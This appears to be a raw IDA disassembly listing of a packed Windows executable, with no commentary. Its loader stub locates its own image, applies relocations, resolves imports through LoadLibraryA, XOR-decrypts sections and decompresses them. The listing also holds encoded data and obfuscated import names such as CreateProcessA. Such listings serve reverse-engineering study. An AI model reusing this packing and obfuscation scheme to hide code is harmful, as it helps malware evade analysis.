dd 0B49E6F32h, 556D7288h, 0F5566B7Ah, 649E91A6h, 0B8F43CC9h
dd 0BEEE766Ah, 90A0A54Dh, 38DF495Ch, 90F5FED5h, 6A9E0792h
dd 0EC30C593h, 0CABE5633h, 7AFF242Dh, 0B77987B8h, 5441A4D5h
dd 73AAF655h, 992A8D8Fh, 361886h, 0DD72F88Dh, 0B6791E3Fh
dd 0DB6FA2FBh, 0CC441E88h, 8EA68E89h, 89390D83h, 0EB39344h
dd 0CD040264h, 9B484D77h, 94CE13F8h, 0E2C6A28Eh, 58B4A79Fh
dd 1F7D9509h, 3B1A46A9h, 0EAA55E3Bh, 30E76649h, 24BF714Fh
dd 33DFE3BCh, 0A3C1E70Ah, 0F205E6A9h, 99C29FF8h, 0F45C9FBAh
dd 7CFED80Ah, 3DCF0322h, 69CF0FACh, 0EFEB9A9h, 0A9BF3869h
dd 0AA84D31Eh, 0BFE315D4h, 0EA7A1349h, 9F6CED30h, 0ECEC5205h
dd 1D309C83h, 932BAA78h, 1BC58D77h, 124B58BFh, 44F53521h
dd 174EBFD2h, 0E151D583h, 0A4655630h, 0E87A6093h, 9CC35A41h
dd 4830F3F7h, 0AA11086h, 125Eh, 23h dup(0)
db 2 dup(0)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
mov edx, [ebp+8]
mov eax, [ebp+0Ch]
sub edx, eax
jz short loc_404C59
mov eax, edx
sub ebx, ebx
shr eax, 10h
mov esi, [ebp+10h]
add esi, [ebp+8]
loc_404BF9: ; CODE XREF: .idata:00404C57�j
cmp dword ptr [esi], 0
jz short loc_404C59
mov ecx, [esi+4]
sub ecx, 8
shr ecx, 1
mov edi, [esi]
add edi, [ebp+8]
add esi, 8
loc_404C0E: ; CODE XREF: .idata:00404C55�j
mov bx, [esi]
shr ebx, 0Ch
cmp ebx, 1
jz short loc_404C25
cmp ebx, 2
jz short loc_404C34
cmp ebx, 3
jz short loc_404C43
jmp short loc_404C4F
; ---------------------------------------------------------------------------
loc_404C25: ; CODE XREF: .idata:00404C17�j
mov bx, [esi]
and ebx, 0FFFh
add [edi+ebx], ax
jmp short loc_404C4F
; ---------------------------------------------------------------------------
loc_404C34: ; CODE XREF: .idata:00404C1C�j
mov bx, [esi]
and ebx, 0FFFh
add [edi+ebx], dx
jmp short loc_404C4F
; ---------------------------------------------------------------------------
loc_404C43: ; CODE XREF: .idata:00404C21�j
mov bx, [esi]
and ebx, 0FFFh
add [edi+ebx], edx
loc_404C4F: ; CODE XREF: .idata:00404C23�j
; .idata:00404C32�j ...
add esi, 2
dec ecx
test ecx, ecx
jnz short loc_404C0E
jmp short loc_404BF9
; ---------------------------------------------------------------------------
loc_404C59: ; CODE XREF: .idata:00404BEA�j
; .idata:00404BFC�j
popa
leave
retn 0Ch
; ---------------------------------------------------------------------------
pusha
call sub_404674
mov esi, [ebp+4034EBh]
add esi, [ebp+4034E3h]
loc_404C70: ; CODE XREF: .idata:00404C7F�j
mov eax, [esi+0Ch]
test eax, eax
jz short loc_404C81
call sub_404C83
add esi, 14h
jmp short loc_404C70
; ---------------------------------------------------------------------------
loc_404C81: ; CODE XREF: .idata:00404C75�j
popa
retn
; =============== S U B R O U T I N E =======================================
sub_404C83 proc near ; CODE XREF: .idata:00404C77�p
push esi
mov eax, [esi+0Ch]
add eax, [ebp+4034E3h]
mov edi, [esi+10h]
add edi, [ebp+4034E3h]
push eax
lea eax, [ebp+403B95h]
call sub_4046FF
mov [ebp+403BA2h], eax
mov eax, [esi+10h]
lea esi, [eax+ebx]
loc_404CAE: ; CODE XREF: sub_404C83+51�j
; sub_404C83+6B�j
lodsd
test eax, eax
jz short loc_404CF0
add eax, [ebp+4034E3h]
bt eax, 1Fh
jb short loc_404CD6
inc eax
inc eax
push eax
push dword ptr [ebp+403BA2h]
lea eax, [ebp+403BA6h]
call sub_4046FF
stosd
jmp short loc_404CAE
; ---------------------------------------------------------------------------
loc_404CD6: ; CODE XREF: sub_404C83+3A�j
and eax, 0FFFFh
push eax
push dword ptr [ebp+403BA2h]
lea eax, [ebp+403BA6h]
call sub_4046FF
stosd
jmp short loc_404CAE
; ---------------------------------------------------------------------------
loc_404CF0: ; CODE XREF: sub_404C83+2E�j
pop esi
retn
sub_404C83 endp
; ---------------------------------------------------------------------------
aLoadlibrarya db 'LoadLibraryA',0
align 10h
dd 47000000h, 72507465h, 6441636Fh, 73657264h
; ---------------------------------------------------------------------------
jnb short $+2
push ebp
mov ebp, esp
sub esp, 0Ch
mov dword ptr [ebp-0Ch], 0
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-4], 0
pusha
mov esi, [ebp+8]
add esi, [esi+3Ch]
movzx edx, word ptr [esi+6]
loc_404D38: ; CODE XREF: .idata:00404D92�j
dec edx
push edx
push esi
call sub_404802
lea ebx, [eax]
inc ebx
cmp dword ptr [ebx], 63727372h
jz short loc_404D90
mov ecx, [eax+10h]
test ecx, ecx
jz short loc_404D90
pusha
mov ecx, [eax+8]
mov [ebp-8], ecx
mov esi, [eax+0Ch]
add esi, [ebp+8]
mov [ebp-4], esi
mov edi, [ebp+0Ch]
xor al, al
mov ecx, [ebp+10h]
rep stosb
mov edi, [ebp+0Ch]
call sub_404DB0
mov edi, esi
mov esi, [ebp+0Ch]
mov ecx, eax
push ecx
push edi
push ecx
push edi
call sub_4045E2
rep movsb
pop eax
pop edx
push edx
push eax
call sub_404D99
popa
loc_404D90: ; CODE XREF: .idata:00404D49�j
; .idata:00404D50�j
test edx, edx
jnz short loc_404D38
popa
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D99 proc near ; CODE XREF: .idata:00404D8A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov esi, [ebp+arg_0]
mov edi, esi
mov ecx, [ebp+arg_4]
loc_404DA5: ; CODE XREF: sub_404D99+10�j
lodsb
xor al, 72h
stosb
loop loc_404DA5
popa
leave
retn 8
sub_404D99 endp
; =============== S U B R O U T I N E =======================================
sub_404DB0 proc near ; CODE XREF: .idata:00404D6F�p
pusha
xor edx, edx
xor ecx, ecx
lodsd
lodsd
call sub_404DC8
call sub_404E4F
dec ecx
shr edx, 1
setb al
retn
sub_404DB0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DC8 proc near ; CODE XREF: sub_404DB0+7�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pop ebx
loc_404DC9: ; CODE XREF: sub_404DC8+33�j
; sub_404DC8:loc_404E07�j
mov eax, edi
sub eax, [esp-4+arg_0]
mov ebp, [esp-4+arg_4]
cmp eax, [ebp+4]
jb short loc_404DDC
popa
mov eax, [esi+4]
retn
; ---------------------------------------------------------------------------
loc_404DDC: ; CODE XREF: sub_404DC8+D�j
call ebx
jnb short loc_404E09
call ebx
jnb short loc_404E10
call ebx
jnb short loc_404E19
call ebx
jnb short loc_404E03
call ebx
jnb short loc_404E02
dec eax
stosd
call sub_404E41
xchg al, ah
loc_404DF9: ; CODE XREF: sub_404DC8+38�j
or ah, ah
jz short loc_404DC9
stosb
dec ah
jmp short loc_404DF9
; ---------------------------------------------------------------------------
loc_404E02: ; CODE XREF: sub_404DC8+26�j
stosb
loc_404E03: ; CODE XREF: sub_404DC8+22�j
sub eax, eax
stosb
loc_404E06: ; CODE XREF: sub_404DC8+46�j
stosb
loc_404E07: ; CODE XREF: sub_404DC8+77�j
jmp short loc_404DC9
; ---------------------------------------------------------------------------
loc_404E09: ; CODE XREF: sub_404DC8+16�j
call sub_404E41
jmp short loc_404E06
; ---------------------------------------------------------------------------
loc_404E10: ; CODE XREF: sub_404DC8+1A�j
call ebx
xchg eax, ebp
call ebx
rcl ebp, 1
jmp short loc_404E1F
; ---------------------------------------------------------------------------
loc_404E19: ; CODE XREF: sub_404DC8+1E�j
call sub_404E41
xchg eax, ebp
loc_404E1F: ; CODE XREF: sub_404DC8+4F�j
inc ebp
inc ebp
push ebx
call sub_404E41
xchg eax, ebx
call eax
jnb short loc_404E33
call sub_404E41
mov bh, al
loc_404E33: ; CODE XREF: sub_404DC8+62�j
add ebx, ebp
neg ebx
loc_404E37: ; CODE XREF: sub_404DC8+74�j
mov al, [ebx+edi]
stosb
dec ebp
jnz short loc_404E37
pop ebx
jmp short loc_404E07
sub_404DC8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404E41 proc near ; CODE XREF: sub_404DC8+2A�p
; sub_404DC8:loc_404E09�p ...
call sub_404E4F
sub cl, 8
mov al, dl
shr edx, 8
retn
sub_404E41 endp
; =============== S U B R O U T I N E =======================================
sub_404E4F proc near ; CODE XREF: sub_404DB0+C�p sub_404E41�p
xor eax, eax
cmp cl, 8
jnb short locret_404E60
lodsb
ror edx, cl
or dl, al
rol edx, cl
add cl, 8
locret_404E60: ; CODE XREF: sub_404E4F+5�j
retn
sub_404E4F endp
; ---------------------------------------------------------------------------
mov ecx, [ebp+4034E3h]
test ecx, ecx
jnz short locret_404E8D
push edx
call $+5
pop ecx
xor cx, cx
loc_404E75: ; CODE XREF: .idata:00404E8A�j
movzx edx, word ptr [ecx]
xor dx, 1667h
cmp dx, 4C2Ah
jz short loc_404E8C
sub ecx, 1000h
jmp short loc_404E75
; ---------------------------------------------------------------------------
loc_404E8C: ; CODE XREF: .idata:00404E82�j
pop edx
locret_404E8D: ; CODE XREF: .idata:00404E69�j
retn
; ---------------------------------------------------------------------------
align 10h
dd 4 dup(0)
dd 282FA79h, 2 dup(282AB66h), 282FA56h, 282FA79h, 282FB08h
dd 2 dup(282AB66h), 282FA61h, 282FB08h, 282FB66h, 2 dup(282AB66h)
dd 282FA6Ch, 282FB66h, 5 dup(282AB66h), 4FCEFDBBh, 46B0F9B5h
dd 4F82F7B2h, 54C601B9h, 4EC6D9BAh, 47CDABB2h, 4EC7F9B8h
dd 46B0DD99h, 0FC82F7B2h, 86F8BCC6h, 3EF8BCB9h, 0BEF8BD8Fh
dd 35F8BC07h, 2F8BEA0h, 282AB66h, 58F5F466h, 66EC17C7h
dd 2CEFDBBh, 67D4AB66h, 67EE1ADCh, 6FF51AACh, 70C81FC7h
dd 74E818DBh, 74F21FC7h, 5582AB66h, 71D61FCBh, 63FA1FCCh
dd 72D810D8h, 67F70CCAh, 67F90FA7h, 75EC1FD8h, 70E818CBh
dd 63F6FEDAh, 28310DAh, 4ED50066h, 70E81BB5h, 65F217A8h
dd 69F114D1h, 67F51FB9h, 2DA18C7h, 74D9AB66h, 4AE81FCFh
dd 71CF1FCFh, 70EC12CDh, 0A6130067h, 0BB6277C4h, 0BBFD77C2h
dd 0D1AC77C2h, 0A62677C5h, 9FBC77C4h, 77C4h, 0
a_clearfp db '_clearfp',0
db 2 dup(0), 5Fh
aClose db 'close',0
align 4
a_commit db '_commit',0
dd 635F0000h, 6F6D6D6Fh, 6564h, 6F635F00h, 6F72746Eh, 37386Ch
dd 635F0000h, 7379706Fh, 6E6769h, 77E7C2C4h, 77E96726h
dd 77E7727Ah, 77E61BB8h, 0
dd 72430000h, 65746165h, 6574754Dh, 4178h, 65724300h, 4E657461h
dd 64656D61h, 65706950h, 41h, 61657243h, 69506574h, 6570h
dd 65724300h, 50657461h, 65636F72h, 417373h, 3EBh dup(0)
_idata ends
; Section 5. (virtual address 00006000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00006000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 406000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start